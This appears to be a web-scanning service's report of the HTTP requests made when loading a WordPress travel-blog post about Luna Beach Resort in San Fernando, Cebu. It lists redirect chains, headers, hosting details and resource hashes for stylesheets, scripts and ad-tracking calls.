https://cm.g.doubleclick.net/pixel?google_nid=index&google_hm=YGaLS8v3KqYvLxF0RhySFwAABzMAAAAB&google_cver=1&google_push=AQvitUI0xRGexIvprOKXUCZV-a6j9t3dEz54nvrj8cumfQ953Ji-HyrhFo0cHfueTUyaXI4VUmZlmWKVTHQaCgFanpKSW2xpnXv8&google_gid=CAESEO5KbdsaRHh9SqZenhnt_Lc

Request Chain 190

https://affiliate.klook.com/s/widgets/banner_v2?prod=banner&w=250&h=250&lang=en&adid=28623&wid=3871&bgtype=Klook& HTTP 302
https://affiliate.klook.com/v3/affsrv/ads/render?prod=banner&w=250&h=250&lang=en&adid=28623&wid=3871&bgtype=Klook&kepler_id=86c61726-8434-4556-96c0-ead7b7526ea6

Request Chain 207

https://www.google.com/pagead/drt/ui HTTP 302
https://googleads.g.doubleclick.net/pagead/drt/si

219 HTTP transactions
11 data transactions

Method
Protocol Status Resource
Path Size
x-fer Time
Latency Type
MIME-Type IP
Location

GET
H2

200

Primary Request / Show response
www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
Redirect Chain

http://itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu
https://itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu
https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/

129 KB
29 KB

1154ms
1139ms

Document
text/html

2606:4700:3032::6815:4c47
CLOUDFLARENET

General

Check archive.org

Show headers Download Go to

Full URL: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
Protocol: H2
Security: TLS 1.3, , AES_128_GCM
Server: 2606:4700:3032::6815:4c47 , United States, ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software: cloudflare / PHP/7.4.15
Resource Hash: 6a955c148b463ff0e18013e7dbe51d9254d147de18404a0b825e917eda132203

Request headers

:method: GET
:authority: www.itravelrox.com
:scheme: https
:path: /2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
pragma: no-cache
cache-control: no-cache
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
accept-encoding: gzip, deflate, br
accept-language: en-US
cookie: __cfduid=d9acc206c11fc3ef8443c75094c8962321617333062
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:05 GMT
content-type: text/html; charset=UTF-8
x-powered-by: PHP/7.4.15
x-pingback: https://www.itravelrox.com/xmlrpc.php
link: <https://www.itravelrox.com/wp-json/>; rel="https://api.w.org/" <https://www.itravelrox.com/?p=548>; rel=shortlink
cache-control: public, max-age=604800
expires: Fri, 09 Apr 2021 03:11:05 GMT
vary: Accept-Encoding,User-Agent
referrer-policy
x-turbo-charged-by: LiteSpeed
cf-cache-status: DYNAMIC
cf-request-id: 0932292aa800004ddc71aa9000000001
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=MdcA1%2FZ2eEDgz%2FYPzC0LNDYprpAlW9MnsISzCAGCsv5ztzJGUDxjhRp6Un3hDWVvtr%2Bn9NdRsoi0n3wtH4AijxCydoNwkjWxXnUud0i9ygK7n7ixRHj20SOvsfnRWXI%3D"}],"max_age":604800,"group":"cf-nel"}
nel: {"max_age":604800,"report_to":"cf-nel"}
server: cloudflare
cf-ray: 6396de243f264ddc-FRA
content-encoding: br
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400

Redirect headers

date: Fri, 02 Apr 2021 03:11:04 GMT
content-type: text/html; charset=UTF-8
x-powered-by: PHP/7.4.15
x-pingback: https://www.itravelrox.com/xmlrpc.php
expires: Fri, 02 Apr 2021 04:11:04 GMT
cache-control: max-age=3600
x-redirect-by: WordPress
location: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
vary: User-Agent
referrer-policy
x-turbo-charged-by: LiteSpeed
cf-cache-status: DYNAMIC
cf-request-id: 09322926af00004ddc36932000000001
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=uzjYVGzzmbsi8TD5Ffgg5G82VXOUXMYN8zYfQLP4INjuyFyORBXlz1MY%2BFItr9cr%2BFyVKUq3zg6rJbT8BTqQEMtiDbt19tY%2BHziKJYEb4yF75Q%2B4kB2lNdIS5g%3D%3D"}],"max_age":604800,"group":"cf-nel"}
nel: {"max_age":604800,"report_to":"cf-nel"}
server: cloudflare
cf-ray: 6396de1de9b74ddc-FRA
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400

GET
H2 200 js Show response
www.googletagmanager.com/gtag/ 97 KB
38 KB 32ms
30ms Script
application/javascript 2a00:1450:4001:802::2008
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://www.googletagmanager.com/gtag/js?id=UA-32708500-1

Requested by

Host: www.itravelrox.com
URL: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/

Protocol

Security

TLS 1.3, , AES_128_GCM

Server

2a00:1450:4001:802::2008 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

Google Tag Manager /

Resource Hash

2f272afa5b9e14859347c402ec7d244ca0404b9551c7675f843bd68d529470cd

Security Headers

Name	Value
Strict-Transport-Security	max-age=31536000; includeSubDomains
X-Xss-Protection	0

Request headers

Referer: https://www.itravelrox.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:05 GMT
content-encoding: br
server: Google Tag Manager
access-control-allow-headers: Cache-Control
vary: Accept-Encoding
content-type: application/javascript; charset=UTF-8
access-control-allow-origin: *
cache-control: private, max-age=900
access-control-allow-credentials: true
cross-origin-resource-policy: cross-origin
strict-transport-security: max-age=31536000; includeSubDomains
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 39090
x-xss-protection: 0
expires: Fri, 02 Apr 2021 03:11:05 GMT

GET
H2 200 style.min.css
www.itravelrox.com/wp-includes/css/dist/block-library/ 29 KB
5 KB 65ms
63ms Stylesheet
text/css 2606:4700:3032::6815:4c47
CLOUDFLARENET

General

Check archive.org

Show headers Download Go to

Full URL: https://www.itravelrox.com/wp-includes/css/dist/block-library/style.min.css
Requested by: Host: www.itravelrox.com
URL: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
Protocol: H2
Security: TLS 1.3, , AES_128_GCM
Server: 2606:4700:3032::6815:4c47 , United States, ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software: cloudflare /
Resource Hash: 4b8fe5c3d0e5ef7a6582185cbf5c535b5d369c8df1da98c03ed69833e55f474d

Request headers

Referer: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:05 GMT
content-encoding: br
cf-cache-status: MISS
nel: {"max_age":604800,"report_to":"cf-nel"}
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 0932292f2400004ddc71ad6000000001
referrer-policy
last-modified: Mon, 01 Jul 2019 13:03:13 GMT
server: cloudflare
etag: W/"726f-5d1a0491-0;gz"
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
vary: Accept-Encoding,User-Agent
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=ijfrbGRuk7VtrO%2F4nA0B%2BlWOGjYuOlJUQvlYRu7fWUA1YsWfCfE1tBJ07cP6WjxO5WaPC4HA9WNvWT4zoOTKQUsicUHKZFOgRmelR0bg5UG2hO2XHdMrWwi94Ftl4GI%3D"}],"max_age":604800,"group":"cf-nel"}
content-type: text/css
cache-control: public, max-age=2592000
x-turbo-charged-by: LiteSpeed
cf-ray: 6396de2b6dbe4ddc-FRA
expires: Sun, 02 May 2021 03:11:05 GMT

GET
H2 200 styles.css
www.itravelrox.com/wp-content/plugins/contact-form-7/includes/css/ 2 KB
916 B 58ms
57ms Stylesheet
text/css 2606:4700:3032::6815:4c47
CLOUDFLARENET

General

Check archive.org

Show headers Download Go to

Full URL: https://www.itravelrox.com/wp-content/plugins/contact-form-7/includes/css/styles.css
Requested by: Host: www.itravelrox.com
URL: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
Protocol: H2
Security: TLS 1.3, , AES_128_GCM
Server: 2606:4700:3032::6815:4c47 , United States, ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software: cloudflare /
Resource Hash: 3ad2fcb328295f1199d593adaba909f3eea790f695554ac3c1da7aa009fc0e0d

Request headers

Referer: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:05 GMT
content-encoding: br
cf-cache-status: MISS
nel: {"max_age":604800,"report_to":"cf-nel"}
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 0932292f2400004ddc4e0a6000000001
referrer-policy
last-modified: Mon, 01 Jul 2019 12:33:17 GMT
server: cloudflare
etag: W/"695-5d19fd8d-0;gz"
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
vary: Accept-Encoding,User-Agent
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=ZYwy%2B5KzLZMA4FExnqNuHrM7YUpFN2j%2FPML2jya64gph8T8NfZyDXmX47DxFby0IBHf5j7EXhdsvBUiGYlvb8BFzqsJ%2FSW4V1yea50%2FEOgcbrbL1o%2BzH54edh8yrvhg%3D"}],"max_age":604800,"group":"cf-nel"}
content-type: text/css
cache-control: public, max-age=2592000
x-turbo-charged-by: LiteSpeed
cf-ray: 6396de2b6dbf4ddc-FRA
expires: Sun, 02 May 2021 03:11:05 GMT

GET
H2 200 lightbox.css
www.itravelrox.com/wp-content/plugins/wp-embed-facebook/templates/lightbox/css/ 3 KB
1 KB 60ms
58ms Stylesheet
text/css 2606:4700:3032::6815:4c47
CLOUDFLARENET

General

Check archive.org

Show headers Download Go to

Full URL: https://www.itravelrox.com/wp-content/plugins/wp-embed-facebook/templates/lightbox/css/lightbox.css
Requested by: Host: www.itravelrox.com
URL: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
Protocol: H2
Security: TLS 1.3, , AES_128_GCM
Server: 2606:4700:3032::6815:4c47 , United States, ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software: cloudflare /
Resource Hash: f6a2fdd1f7b3fe50b945b9945ab60f4104cf241c8d90ed2560ecb873aedb73d5

Request headers

Referer: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:05 GMT
content-encoding: br
cf-cache-status: MISS
nel: {"max_age":604800,"report_to":"cf-nel"}
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 0932292f2800004ddc19830000000001
referrer-policy
last-modified: Mon, 01 Jul 2019 12:36:12 GMT
server: cloudflare
etag: W/"c71-5d19fe3c-0;gz"
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
vary: Accept-Encoding,User-Agent
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=GM54W%2BgtwGo3Xk%2FLcKnSDmyoG2eWEWV%2BI%2BQQmN1qWmtzxKqDuiKY7B7UtA%2B4K00gbyu0YWR9389e%2F%2F5Z%2F43ELpH9mVDFytWPKcL5kkpBE5wu8tinpmp9wDGDTjBBbP8%3D"}],"max_age":604800,"group":"cf-nel"}
content-type: text/css
cache-control: public, max-age=2592000
x-turbo-charged-by: LiteSpeed
cf-ray: 6396de2b6dc14ddc-FRA
expires: Sun, 02 May 2021 03:11:05 GMT

GET
H2 200 css
fonts.googleapis.com/ 20 KB
1 KB 17ms
15ms Stylesheet
text/css 2a00:1450:4001:828::200a
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://fonts.googleapis.com/css?family=Open+Sans%3A400%2C300%2C300italic%2C400italic%2C600italic%2C600%2C700%2C700italic%2C800%2C800italic

Requested by

Host: www.itravelrox.com
URL: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/

Protocol

Security

TLS 1.3, , AES_128_GCM

Server

2a00:1450:4001:828::200a Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

ESF /

Resource Hash

5e0d7c507cf900775df1d347c362c6ab870162905b31ca3b2b4afd5f73fad98f

Security Headers

Name	Value
Strict-Transport-Security	max-age=31536000
X-Content-Type-Options	nosniff
X-Frame-Options	SAMEORIGIN
X-Xss-Protection	0

Request headers

Referer: https://www.itravelrox.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

strict-transport-security: max-age=31536000
content-encoding: gzip
x-content-type-options: nosniff
cross-origin-resource-policy: cross-origin
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
x-xss-protection: 0
last-modified: Fri, 02 Apr 2021 01:38:38 GMT
server: ESF
date: Fri, 02 Apr 2021 03:11:05 GMT
x-frame-options: SAMEORIGIN
content-type: text/css; charset=utf-8
access-control-allow-origin: *
cache-control: private, max-age=86400, stale-while-revalidate=604800
timing-allow-origin: *
link: <https://fonts.gstatic.com>; rel=preconnect; crossorigin
expires: Fri, 02 Apr 2021 03:11:05 GMT

GET
H2 200 bootstrap.css
www.itravelrox.com/wp-content/themes/zerif-lite/css/ 89 KB
14 KB 59ms
57ms Stylesheet
text/css 2606:4700:3032::6815:4c47
CLOUDFLARENET

General

Check archive.org

Show headers Download Go to

Full URL: https://www.itravelrox.com/wp-content/themes/zerif-lite/css/bootstrap.css
Requested by: Host: www.itravelrox.com
URL: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
Protocol: H2
Security: TLS 1.3, , AES_128_GCM
Server: 2606:4700:3032::6815:4c47 , United States, ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software: cloudflare /
Resource Hash: bb4212ad8b093e7744fdd5607fbefc2e26105b5b97936f086c2c56f860f08e1e

Request headers

Referer: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:05 GMT
content-encoding: br
cf-cache-status: MISS
nel: {"max_age":604800,"report_to":"cf-nel"}
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 0932292f2500004ddc1dbce000000001
referrer-policy
last-modified: Thu, 28 Jul 2016 07:07:13 GMT
server: cloudflare
etag: W/"16244-5799af21-0;gz"
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
vary: Accept-Encoding,User-Agent
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=Kaqh0rmYgKE%2Bsrmz1QcsYaD4y6egRLA55yxZUEc5Uy0bBDPgpnkrVkoJQBZSUAYJS9nQNz4A8Llq%2B%2BkxAQ8p7HIIsCX7N%2Fl3RSxgglQl7ubkMdncv5Nf626ZJ8uz6R8%3D"}],"max_age":604800,"group":"cf-nel"}
content-type: text/css
cache-control: public, max-age=2592000
x-turbo-charged-by: LiteSpeed
cf-ray: 6396de2b6dc34ddc-FRA
expires: Sun, 02 May 2021 03:11:05 GMT

GET
H2 200 font-awesome.min.css
www.itravelrox.com/wp-content/themes/zerif-lite/css/ 21 KB
5 KB 63ms
61ms Stylesheet
text/css 2606:4700:3032::6815:4c47
CLOUDFLARENET

General

Check archive.org

Show headers Download Go to

Full URL: https://www.itravelrox.com/wp-content/themes/zerif-lite/css/font-awesome.min.css
Requested by: Host: www.itravelrox.com
URL: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
Protocol: H2
Security: TLS 1.3, , AES_128_GCM
Server: 2606:4700:3032::6815:4c47 , United States, ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software: cloudflare /
Resource Hash: 0fb1bbca73646e8e2b93c82e8d8b219647b13d4b440c48e338290b9a685b8de1

Request headers

Referer: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:05 GMT
content-encoding: br
cf-cache-status: MISS
nel: {"max_age":604800,"report_to":"cf-nel"}
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 0932292f2500004ddc1b8b5000000001
referrer-policy
last-modified: Thu, 28 Jul 2016 07:07:13 GMT
server: cloudflare
etag: W/"55e0-5799af21-0;gz"
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
vary: Accept-Encoding,User-Agent
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=M9ibz%2BDsp6sLXZnehK2vVg25c4p4SQoTPvIq8mIX0YTOcCK70%2FnAFNBhrCNuANF3QSZSngPi%2FnZE3aEoHGPiakuBJgcyKAPFWDZwpybErlkRHWWvS8AEuDPzkQxNERg%3D"}],"max_age":604800,"group":"cf-nel"}
content-type: text/css
cache-control: public, max-age=2592000
x-turbo-charged-by: LiteSpeed
cf-ray: 6396de2b6dc64ddc-FRA
expires: Sun, 02 May 2021 03:11:05 GMT

GET
H2 200 style.css
www.itravelrox.com/wp-content/themes/zerif-lite/ 127 KB
22 KB 97ms
96ms Stylesheet
text/css 2606:4700:3032::6815:4c47
CLOUDFLARENET

General

Check archive.org

Show headers Download Go to

Full URL: https://www.itravelrox.com/wp-content/themes/zerif-lite/style.css
Requested by: Host: www.itravelrox.com
URL: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
Protocol: H2
Security: TLS 1.3, , AES_128_GCM
Server: 2606:4700:3032::6815:4c47 , United States, ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software: cloudflare /
Resource Hash: 6121ae99873890f27098d2a415720ed2bb2affde08d24809c080914ee8e054e4

Request headers

Referer: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:05 GMT
content-encoding: br
cf-cache-status: MISS
nel: {"max_age":604800,"report_to":"cf-nel"}
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 0932292f2500004ddc2b06a000000001
referrer-policy
last-modified: Thu, 28 Jul 2016 07:07:13 GMT
server: cloudflare
etag: W/"1fae5-5799af21-0;gz"
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
vary: Accept-Encoding,User-Agent
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=TXfJO77pJAuIcUTUOFmhu%2BmgeYjpDsj%2F4W%2BwU80YqaPoLg1kWU0VzY2F9lRhZnT%2Fs7oFXkBY2hXyPCuEQVO8DLLWcw6Mxn5XFxU%2FUNiH%2FPIaKQW6bssrF7Ij%2FhDv4BU%3D"}],"max_age":604800,"group":"cf-nel"}
content-type: text/css
cache-control: public, max-age=2592000
x-turbo-charged-by: LiteSpeed
cf-ray: 6396de2b6dc84ddc-FRA
expires: Sun, 02 May 2021 03:11:05 GMT

GET
H2 200 responsive.css
www.itravelrox.com/wp-content/themes/zerif-lite/css/ 2 KB
858 B 61ms
60ms Stylesheet
text/css 2606:4700:3032::6815:4c47
CLOUDFLARENET

General

Check archive.org

Show headers Download Go to

Full URL: https://www.itravelrox.com/wp-content/themes/zerif-lite/css/responsive.css
Requested by: Host: www.itravelrox.com
URL: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
Protocol: H2
Security: TLS 1.3, , AES_128_GCM
Server: 2606:4700:3032::6815:4c47 , United States, ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software: cloudflare /
Resource Hash: 1e5a599b3674c6fa1fdd565a2ae414aa345e24dcb1b7d17bb683be56a9364dbc

Request headers

Referer: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:05 GMT
content-encoding: br
cf-cache-status: MISS
nel: {"max_age":604800,"report_to":"cf-nel"}
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 0932292f2500004ddc76a8c000000001
referrer-policy
last-modified: Thu, 28 Jul 2016 07:07:13 GMT
server: cloudflare
etag: W/"94d-5799af21-0;gz"
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
vary: Accept-Encoding,User-Agent
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=24U6CL40YFLdXiFfz9yf0jkfyVUSSIOpMYpaU%2BJ1sIlNDJzV3smGMCKjBf7zPE9EN%2B5fhne70WnUQ%2Ffp5YymGSneYGvFkatd7gQT%2BIp86ya8aTh3m2j5hyesoZZd%2BQI%3D"}],"max_age":604800,"group":"cf-nel"}
content-type: text/css
cache-control: public, max-age=2592000
x-turbo-charged-by: LiteSpeed
cf-ray: 6396de2b6dca4ddc-FRA
expires: Sun, 02 May 2021 03:11:05 GMT

GET
H2 200 ytprefs.min.css
www.itravelrox.com/wp-content/plugins/youtube-embed-plus/styles/ 6 KB
2 KB 62ms
61ms Stylesheet
text/css 2606:4700:3032::6815:4c47
CLOUDFLARENET

General

Check archive.org

Show headers Download Go to

Full URL: https://www.itravelrox.com/wp-content/plugins/youtube-embed-plus/styles/ytprefs.min.css
Requested by: Host: www.itravelrox.com
URL: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
Protocol: H2
Security: TLS 1.3, , AES_128_GCM
Server: 2606:4700:3032::6815:4c47 , United States, ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software: cloudflare /
Resource Hash: cc29d9f69561a08175e5ce7d2b503dbb202b5a3b6a77e80ceb3830cd9640c1e0

Request headers

Referer: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:05 GMT
content-encoding: br
cf-cache-status: MISS
nel: {"max_age":604800,"report_to":"cf-nel"}
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 0932292f2600004ddc82913000000001
referrer-policy
last-modified: Sat, 05 Oct 2019 11:10:53 GMT
server: cloudflare
etag: W/"17f9-5d987a3d-0;gz"
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
vary: Accept-Encoding,User-Agent
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=NYTSx0gwv14%2B0Uzp9SSZfSNdyDjoOgxi0iBhvcuHXuFx5MZ8rFmLKEdku9%2B58%2FM7bqI9K2zuYgDpGrSE4r1QZtHA%2BKZLRs0OHTBt7jJnrwPxtjSRPFnb7Bib8gYFKAQ%3D"}],"max_age":604800,"group":"cf-nel"}
content-type: text/css
cache-control: public, max-age=2592000
x-turbo-charged-by: LiteSpeed
cf-ray: 6396de2b6dcb4ddc-FRA
expires: Sun, 02 May 2021 03:11:05 GMT

GET
H2 200 frontend-gtag.min.js Show response
www.itravelrox.com/wp-content/plugins/google-analytics-for-wordpress/assets/js/ 9 KB
3 KB 57ms
53ms Script
application/x-javascript 2606:4700:3032::6815:4c47
CLOUDFLARENET

General

Check archive.org

Show headers Download Go to

Full URL: https://www.itravelrox.com/wp-content/plugins/google-analytics-for-wordpress/assets/js/frontend-gtag.min.js
Requested by: Host: www.itravelrox.com
URL: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
Protocol: H2
Security: TLS 1.3, , AES_128_GCM
Server: 2606:4700:3032::6815:4c47 , United States, ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software: cloudflare /
Resource Hash: a98e42b2d4ab1ae36f3b270a0dff6ad2f158100833978ff0a549674a2543e78a

Request headers

Referer: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:05 GMT
content-encoding: br
cf-cache-status: MISS
nel: {"max_age":604800,"report_to":"cf-nel"}
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 0932292f9300004ddc4114e000000001
referrer-policy
last-modified: Tue, 23 Mar 2021 11:05:51 GMT
server: cloudflare
etag: W/"23d2-6059cb8f-0;gz"
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
vary: Accept-Encoding,User-Agent
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=OLypXjXylRmDB7kST4YxJdLHZHEJZ91WMHt9SIcMbosdaeWWSwFenBxoD3QZrvwbGms5RAyQNZrJ8KPhzuaxk%2FcKiGcPI1bpuuHxwcorKxX0g9znVpJjllxb2IdWexA%3D"}],"max_age":604800,"group":"cf-nel"}
content-type: application/x-javascript
cache-control: public, max-age=31536000
x-turbo-charged-by: LiteSpeed
cf-ray: 6396de2c1e774ddc-FRA
expires: Sat, 02 Apr 2022 03:11:05 GMT

GET
H2 200 jquery.js Show response
www.itravelrox.com/wp-includes/js/jquery/ 95 KB
32 KB 84ms
80ms Script
application/x-javascript 2606:4700:3032::6815:4c47
CLOUDFLARENET

General

Check archive.org

Show headers Download Go to

Full URL: https://www.itravelrox.com/wp-includes/js/jquery/jquery.js
Requested by: Host: www.itravelrox.com
URL: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
Protocol: H2
Security: TLS 1.3, , AES_128_GCM
Server: 2606:4700:3032::6815:4c47 , United States, ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software: cloudflare /
Resource Hash: 1db21d816296e6939ba1f42962496e4134ae2b0081e26970864c40c6d02bb1df

Request headers

Referer: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:05 GMT
content-encoding: br
cf-cache-status: MISS
nel: {"max_age":604800,"report_to":"cf-nel"}
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
